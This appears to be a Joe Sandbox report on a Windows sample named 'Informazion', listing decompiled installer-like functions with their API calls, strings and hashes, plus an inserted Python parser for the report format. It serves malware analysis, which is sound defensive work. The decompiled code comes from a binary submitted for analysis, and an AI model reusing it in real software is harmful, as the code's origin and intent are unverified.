                                                    				SetWindowTextA(??, ??);
                                                    				r9d = r9d ^ r9d;
                                                    				_v16 = 0x4c51ca50;
                                                    				_v24 = _v24 & 0x00000000;
                                                    				_t27 = CreateThread(??, ??, ??, ??, ??, ??);
                                                    				 *0x4c51ca58 = 0x4c51ca50;
                                                    				if (0x4c51ca50 != 0) goto 0x4c513b26;
                                                    				_v16 = _v16 & _t27;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v24 = 0x10;
                                                    				E00007FF67FF64C514DCC(_t81, E00007FF67FF64C515D90, 0xffff0000, _t94);
                                                    				goto 0x4c513a09;
                                                    				if (_t83 != 0x1b) goto 0x4c513b26;
                                                    				 *0x4c51d5fc = 1;
                                                    				return EndDialog(??, ??);
			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                    • String ID: $Maintal
                                                    • API String ID: 2654313074-3681620210
                                                    • Opcode ID: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                                    • Instruction ID: 50a18d803af5e492968551fc6eb145dedd7f9a7f9860d366633f3bdec4be3270
                                                    • Opcode Fuzzy Hash: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                                    • Instruction Fuzzy Hash: C8516F31E0C64286E718BF19E85C27D6EA1FB89B95F449233D96E83798DF3CA465C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514A86
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514AAA
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514ACA
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514AEC
                                                    • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514B1B
                                                    • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514B3A
                                                    • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514B54
                                                    • FreeLibrary.KERNEL32 ref: 00007FF64C514BF1
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514C0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                    • API String ID: 1865808269-1731843650
                                                    • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                    • Instruction ID: d045111355cfb5ab56711c987c42ddab08c279e2fd8b1084f053e0b562d070aa
                                                    • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                    • Instruction Fuzzy Hash: DE517C25E0DA8286EB09BF19A81817D7EA0FB89B90F445136DE6E83794DF3CE454C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
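The function above is the one place in this listing where imports are resolved at run time: LoadLibraryA followed by three GetProcAddress calls, with SHELL32.DLL, SHBrowseForFolder and SHGetPathFromIDList sitting in the same function's string pool. When working through a report of this length it helps to parse the "APIs" and "Similarity" entries mechanically and flag exactly that pattern. The following Python is an added example, not part of the Joe Sandbox report or of the sample; the sample block it parses is constructed in the report's own layout, and the LoadLibrary/GetProcAddress heuristic is this example's, not the sandbox's.

```python
"""Parse the per-function 'APIs' and 'Similarity' entries of a Joe Sandbox
C-code listing into structured records, then flag functions that resolve
imports at run time (LoadLibrary + GetProcAddress).  Added example, not part
of the report; the sample lines below are constructed in the report's format."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: one function's entries, in the layout the report uses.
SAMPLE_BLOCK = """APIs
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514A86
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514AAA
• GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514B1B
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514B3A
• FreeLibrary.KERNEL32 ref: 00007FF64C514BF1
Strings
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
"""

API_LINE = re.compile(
    r"^(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"        # e.g. LoadLibraryA.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"                       # optional recorded arguments
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"       # call-site address
)
ID_LINE = re.compile(
    r"^(?:•\s*)?(?P<key>API ID|String ID|API String ID):\s*(?P<value>.*)$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int            # call-site address as an integer
    args: List[str]     # '?' for unresolved arguments, hex text otherwise


@dataclass
class FunctionSummary:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    ids: Dict[str, str] = field(default_factory=dict)


def parse_block(text: str) -> FunctionSummary:
    """Parse one function's 'APIs'/'Similarity' entries."""
    summary = FunctionSummary()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            raw_args = m.group("args") or ""
            args = [a.strip() for a in raw_args.split(",") if a.strip()]
            summary.calls.append(ApiCall(m.group("api"), m.group("module"),
                                         int(m.group("ref"), 16), args))
            continue
        m = ID_LINE.match(line)
        if m:
            summary.ids[m.group("key")] = m.group("value").strip()
    # The report joins the per-function string pool with '$'; a leading '$'
    # (as in "$Maintal") yields an empty token, which is dropped here.
    summary.strings = [s for s in summary.ids.get("String ID", "").split("$") if s]
    return summary


LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def resolved_imports(summary: FunctionSummary) -> Optional[Dict[str, List[str]]]:
    """Heuristic: if a function both loads a library and looks up exports by
    name, return the DLL names and export names found in its string pool.
    The association is by function, so it is strong but not proven."""
    apis = {c.api for c in summary.calls}
    if not (LOADERS & apis and "GetProcAddress" in apis):
        return None
    libs = [s for s in summary.strings if s.upper().endswith(".DLL")]
    exports = [s for s in summary.strings if not s.upper().endswith(".DLL")]
    return {"libraries": libs, "exports": exports}


if __name__ == "__main__":
    parsed = parse_block(SAMPLE_BLOCK)
    for call in parsed.calls:
        print(f"{call.ref:016X}  {call.module}!{call.api}")
    print(resolved_imports(parsed))
```

Run over every function block of the report, the same parser also lets you sort functions by call-site address and diff the string pools between two samples with matching API String IDs.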

                                                    C-Code - Quality: 25%
                                                    			E00007FF67FF64C514DCC(void* __rcx, void* __r8, long long __r9, void* __r10) {
                                                    				void* __rbx;
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				intOrPtr _t26;
                                                    				char _t27;
                                                    				void* _t31;
                                                    				int _t32;
                                                    				void* _t34;
                                                    				void* _t42;
                                                    				int _t43;
                                                    				signed long long _t76;
                                                    				void* _t80;
                                                    				void* _t83;
                                                    				void* _t84;
                                                    				void* _t86;
                                                    				signed long long _t87;
                                                    				signed long long _t88;
                                                    				void* _t93;
                                                    				void* _t95;
                                                    				void* _t99;
                                                    				void* _t109;
                                                    				void* _t114;
                                                    				void* _t115;
                                                    				signed long long _t116;
                                                    				long long _t130;
                                                    
                                                    				_t114 = _t115 - 0x180;
                                                    				_t116 = _t115 - 0x280;
                                                    				_t76 =  *0x4c51c008; // 0xdeba5460e397
                                                    				 *(_t114 + 0x170) = _t76 ^ _t116;
                                                    				_t26 =  *0x4c519938; // 0x2e656372
                                                    				_t130 = __r9;
                                                    				asm("movups xmm0, [0x4b01]");
                                                    				 *((intOrPtr*)(_t116 + 0x60)) = _t26;
                                                    				_t27 =  *0x4c51993c; // 0x0
                                                    				asm("movups xmm1, [0x4afa]");
                                                    				 *((char*)(_t116 + 0x64)) = _t27;
                                                    				asm("movups [esp+0x30], xmm0");
                                                    				asm("movups xmm0, [0x4aef]");
                                                    				asm("movups [esp+0x40], xmm1");
                                                    				asm("movups [esp+0x50], xmm0");
                                                    				if (( *0x4c51cd18 & 0x00000001) != 0) goto 0x4c515026;
                                                    				r9d = 0x200;
                                                    				 *((char*)(_t116 + 0x70)) = 0;
                                                    				LoadStringA(??, ??, ??, ??);
                                                    				if ( *((char*)(_t116 + 0x70)) != 0) goto 0x4c514eb5;
                                                    				if (E00007FF67FF64C517F04(_t87, _t109, __r8, _t116 + 0x70) == 0) goto 0x4c514e8b;
                                                    				_t31 = E00007FF67FF64C517E34(_t87, _t114);
                                                    				r9d = 0x190010;
                                                    				if (_t31 != 0) goto 0x4c514e91;
                                                    				r9d = 0x10010;
                                                    				_t32 = MessageBoxA(??, ??, ??, ??);
                                                    				goto 0x4c515026;
                                                    				_t88 = _t87 | 0xffffffff;
                                                    				if (_t130 == 0) goto 0x4c514f31;
                                                    				_t80 = _t88 + 1;
                                                    				if ( *((char*)(_t130 + _t80)) != 0) goto 0x4c514ec1;
                                                    				_t93 = _t88 + 1;
                                                    				if ( *((char*)(__r8 + _t93)) != 0) goto 0x4c514ece;
                                                    				_t107 = _t116 + 0x70;
                                                    				_t95 = _t88 + 1;
                                                    				if ( *((char*)(_t116 + 0x70 + _t95)) != 0) goto 0x4c514ee2;
                                                    				_t83 = _t80 + _t93 + 0x64 + _t95;
                                                    				r15d = _t32;
                                                    				LocalAlloc(??, ??);
                                                    				if (_t83 == 0) goto 0x4c515024;
                                                    				 *((long long*)(_t116 + 0x20)) = _t130;
                                                    				_t34 = E00007FF67FF64C51114C(_t83, _t116 + 0x70, _t116 + 0x70, __r8);
                                                    				goto 0x4c514fbc;
                                                    				_t84 = _t83 + 1;
                                                    				if ( *((char*)(_t116 + 0x70 + _t84)) != 0) goto 0x4c514f36;
                                                    				if (__r8 == 0) goto 0x4c514f8e;
                                                    				_t99 = _t88 + 1;
                                                    				if ( *((char*)(__r8 + _t99)) != 0) goto 0x4c514f47;
                                                    				_t86 = _t84 + 0x64 + _t99;
                                                    				r14d = _t34;
                                                    				LocalAlloc(??, ??);
                                                    				if (_t86 == 0) goto 0x4c515024;
                                                    				E00007FF67FF64C51114C(_t86, _t116 + 0x70, _t116 + 0x70, __r8);
                                                    				goto 0x4c514fbc;
                                                    				LocalAlloc(??, ??);
                                                    				if (_t86 == 0) goto 0x4c515024;
                                                    				E00007FF67FF64C511008(_t86, _t107, _t116 + 0x70, __r10);
                                                    				MessageBeep(??);
                                                    				if (E00007FF67FF64C517F04(_t88, _t86, __r8, _t116 + 0x70) == 0) goto 0x4c514fe6;
                                                    				_t42 = E00007FF67FF64C517E34(_t88, _t114);
                                                    				r9d = 0x190000;
                                                    				if (_t42 != 0) goto 0x4c514fec;
                                                    				r9d = 0x10000;
                                                    				r9d = r9d |  *(_t114 + 0x1e0);
                                                    				r9d = r9d |  *(_t114 + 0x1e8);
                                                    				_t43 = MessageBoxA(??, ??, ??, ??);
                                                    				LocalFree(??);
                                                    				return E00007FF67FF64C518470(_t43,  *(_t114 + 0x1e0),  *(_t114 + 0x170) ^ _t116);
			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                    • String ID: Maintal$rce.
                                                    • API String ID: 2929476258-4232535448
                                                    • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                    • Instruction ID: 76b8979073a4a3acb07e9a51f5d991a9e2569ad3dcad8dbe35599f490e270310
                                                    • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                    • Instruction Fuzzy Hash: 0B61D121E0C7C186FB19BF69A8083BD6E90AB59BA4F445232DE6D83395DF3CE591C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 41%
                                                    			E00007FF67FF64C51261C(long long __rbx, long long __rcx, void* __rdx, char* __r8) {
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				char _t30;
                                                    				void* _t44;
                                                    				char _t58;
                                                    				signed long long _t67;
                                                    				signed long long _t68;
                                                    				long long _t76;
                                                    				char* _t82;
                                                    				void* _t83;
                                                    				CHAR* _t100;
                                                    				void* _t102;
                                                    				CHAR* _t107;
                                                    				void* _t110;
                                                    				signed long long _t111;
                                                    				void* _t120;
                                                    				CHAR* _t121;
                                                    				CHAR* _t124;
                                                    
                                                    				_t95 = __rdx;
                                                    				 *((long long*)(_t110 + 0x10)) = __rbx;
                                                    				_t108 = _t110 - 0x60;
                                                    				_t111 = _t110 - 0x160;
                                                    				_t67 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_t68 = _t67 ^ _t111;
                                                    				 *(_t110 - 0x60 + 0x50) = _t68;
                                                    				 *((intOrPtr*)(__rcx)) = dil;
                                                    				_t76 = __rcx;
                                                    				_t4 =  &(_t100[1]); // 0x1
                                                    				r15d = _t4;
                                                    				if ( *__r8 != 0x23) goto 0x4c5127e0;
                                                    				CharUpperA(_t124);
                                                    				CharNextA(_t121);
                                                    				CharNextA(_t100);
                                                    				_t105 = _t68;
                                                    				if (r14b == 0x53) goto 0x4c5127dd;
                                                    				if (r14b == 0x57) goto 0x4c5127c7;
                                                    				 *((intOrPtr*)(_t111 + 0x34)) = 0x104;
                                                    				_t82 = _t111 + 0x40;
                                                    				_t8 = _t95 + 0x7ffffefa; // 0x7ffffffe
                                                    				if (_t8 == 0) goto 0x4c5126e5;
                                                    				_t30 =  *((intOrPtr*)("Software\\Microsoft\\Windows\\CurrentVersion\\App Paths" - _t111 + 0x40 + _t82));
                                                    				_t58 = _t30;
                                                    				if (_t58 == 0) goto 0x4c5126e5;
                                                    				 *_t82 = _t30;
                                                    				_t83 = _t82 + _t124;
                                                    				if (_t58 != 0) goto 0x4c5126c7;
                                                    				_t72 =  !=  ? _t83 : _t83 - 1;
                                                    				 *((intOrPtr*)( !=  ? _t83 : _t83 - 1)) = dil;
                                                    				E00007FF67FF64C517BA8(0x104,  !=  ? _t83 : _t83 - 1, __rcx, _t111 + 0x40, _t68, _t110 - 0x60, _t68);
                                                    				r9d = 0x20019;
                                                    				r8d = 0;
                                                    				 *((long long*)(_t111 + 0x20)) = _t111 + 0x38;
                                                    				if (RegOpenKeyExA(??, ??, ??, ??, ??) != 0) goto 0x4c5127f5;
                                                    				 *((long long*)(_t111 + 0x28)) = _t111 + 0x34;
                                                    				r8d = 0;
                                                    				 *((long long*)(_t111 + 0x20)) = _t76;
                                                    				if (RegQueryValueExA(??, ??, ??, ??, ??, ??) != 0) goto 0x4c5127b4;
                                                    				if ( *((intOrPtr*)(_t111 + 0x30)) != 2) goto 0x4c5127ad;
                                                    				r8d = 0x104;
                                                    				if (ExpandEnvironmentStringsA(??, ??, ??) == 0) goto 0x4c5127a9;
                                                    				E00007FF67FF64C511008(_t76, _t111 + 0x40, _t111 + 0x40, _t120);
                                                    				goto 0x4c5127b4;
                                                    				_t53 =  ==  ? r15d : r15d;
                                                    				RegCloseKey(_t102);
                                                    				goto 0x4c5127f1;
                                                    				GetWindowsDirectoryA(_t107);
                                                    				goto 0x4c5127f5;
                                                    				GetSystemDirectoryA(??, ??);
                                                    				_t65 =  ==  ? r15d : r15d;
                                                    				if (( ==  ? r15d : r15d) != 0) goto 0x4c512805;
                                                    				E00007FF67FF64C517BA8(0x104, _t111 + 0x34, _t76, _t76, _t68, _t108, _t105);
                                                    				return E00007FF67FF64C518470(r15d, _t44,  *(_t108 + 0x50) ^ _t111);
			}
                                                    0x7ff64c512800
                                                    0x7ff64c51282a

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                    • API String ID: 2659952014-2428544900
                                                    • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                    • Instruction ID: e2f7fb3dc07e9d2f0c1ada4025b1fb8eb5a0aca0acf7d0036fa75a69f051ec88
                                                    • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                    • Instruction Fuzzy Hash: 30517036A0C68186EB14BF18F8482BE7BA0FB8AB90F545032DA6E43795DF3CD555C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                    • String ID: Maintal
                                                    • API String ID: 3785188418-1608070445
                                                    • Opcode ID: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                                    • Instruction ID: 637ae13506779cd3d7f370983830601c10e101493515eb818122715e2c000492
                                                    • Opcode Fuzzy Hash: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                                    • Instruction Fuzzy Hash: B8314475D0C642C6E6187F29A81C27C7FA1FB8AB51F459232C97E82395DF7CA459C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                    • API String ID: 3346862599-1109908249
                                                    • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                    • Instruction ID: 1c654e50f476df9910211975a588b556062ce25edbbc79c6a5378db4f6eb781e
                                                    • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                    • Instruction Fuzzy Hash: 8A514F32E0CA458AE724AF28E84817D7BA1FB89B54F464132DA7D83794DF3DE564CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                    • API String ID: 4204503880-1888249752
                                                    • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                    • Instruction ID: c9e8be2e3ccc9c30affd75b00602bc9185aa9714e95d6ea43d61359a74969c1b
                                                    • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                    • Instruction Fuzzy Hash: 6E310F36A0CB458AD614AF1AF4441AEBFA0FB89B90F455136DE5D83714DF3CE155CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                    • String ID:
                                                    • API String ID: 1051330783-0
                                                    • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                    • Instruction ID: 6b1371b3b972e24a02ed1eb488d2892129eebe228017b89f34f4379d862b2dd8
                                                    • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                    • Instruction Fuzzy Hash: A3513531E0C6428AEB18BF1DA8085BC7FA5FB48B94F555132DE2DA3794DE78E4A1C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 43%
                                                    			E00007FF67FF64C512A6C(long long __rbx, intOrPtr* __rcx, void* __rdx, char* __r8, long long _a32) {
                                                    				signed int _v40;
                                                    				char _v312;
                                                    				void* __rsi;
                                                    				int _t19;
                                                    				signed long long _t54;
                                                    				signed long long _t55;
                                                    				char* _t57;
                                                    				intOrPtr* _t65;
                                                    				void* _t98;
                                                    				void* _t99;
                                                    				void* _t105;
                                                    				signed long long _t106;
                                                    				signed long long _t107;
                                                    
                                                    				_a32 = __rbx;
                                                    				_t54 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_t55 = _t54 ^ _t99 - 0x00000140;
                                                    				_v40 = _t55;
                                                    				_t98 = __rdx;
                                                    				if ( *((char*)(__rcx)) == 0) goto 0x4c512c27;
                                                    				r8d = 0x104;
                                                    				GetModuleFileNameA(??, ??, ??);
                                                    				_t18 =  *__rcx;
                                                    				if ( *__rcx == 0) goto 0x4c512c24;
                                                    				_t107 = _t106 | 0xffffffff;
                                                    				_t19 = IsDBCSLeadByte(??);
                                                    				 *__r8 =  *__rcx;
                                                    				if (_t19 == 0) goto 0x4c512ae8;
                                                    				 *((char*)(__r8 + 1)) =  *((intOrPtr*)(__rcx + 1));
                                                    				if ( *((char*)(__rcx)) != 0x23) goto 0x4c512bf6;
                                                    				CharNextA(??);
                                                    				if (CharUpperA(??) != 0x44) goto 0x4c512b9b;
                                                    				E00007FF67FF64C517C40(_t55, __r8,  &_v312,  &_v312, __rdx);
                                                    				_t57 = _t107 + 1;
                                                    				if ( *((char*)( &_v312 + _t57)) != 0) goto 0x4c512b2d;
                                                    				CharPrevA(??, ??);
                                                    				if (_t57 == 0) goto 0x4c512b5c;
                                                    				if ( *_t57 != 0x5c) goto 0x4c512b5c;
                                                    				 *_t57 = 0;
                                                    				if (__r8 - _t98 < 0) goto 0x4c512b7e;
                                                    				if (__r8 - _t98 - 0x400 > 0) goto 0x4c512b7e;
                                                    				goto 0x4c512b80;
                                                    				E00007FF67FF64C511008(__r8, _t98 - __r8 + 0x400,  &_v312, _t105);
                                                    				if ( *((char*)(__r8 + _t107 + 1)) != 0) goto 0x4c512b90;
                                                    				goto 0x4c512bec;
                                                    				if (CharUpperA(??) != 0x45) goto 0x4c512bf1;
                                                    				if (__r8 - _t98 < 0) goto 0x4c512bd1;
                                                    				if (__r8 - _t98 - 0x400 > 0) goto 0x4c512bd1;
                                                    				goto 0x4c512bd3;
                                                    				E00007FF67FF64C511008(__r8, _t98 - __r8 + 0x400,  &_v312, _t105);
                                                    				_t65 = _t107 + 1;
                                                    				if ( *((char*)(__r8 + _t65)) != 0) goto 0x4c512be3;
                                                    				goto 0x4c512c08;
                                                    				if ( *_t55 != 0x23) goto 0x4c512c08;
                                                    				CharNextA(??);
                                                    				CharNextA(??);
                                                    				if ( *_t65 != 0) goto 0x4c512acc;
                                                    				 *_t65 = 0;
                                                    				return E00007FF67FF64C518470( *_t65, _t18, _v40 ^ _t99 - 0x00000140);
                                                    			}

                                                    0x7ff64c512a6c
                                                    0x7ff64c512a7c
                                                    0x7ff64c512a83
                                                    0x7ff64c512a86
                                                    0x7ff64c512a94
                                                    0x7ff64c512a9a
                                                    0x7ff64c512aac
                                                    0x7ff64c512ab2
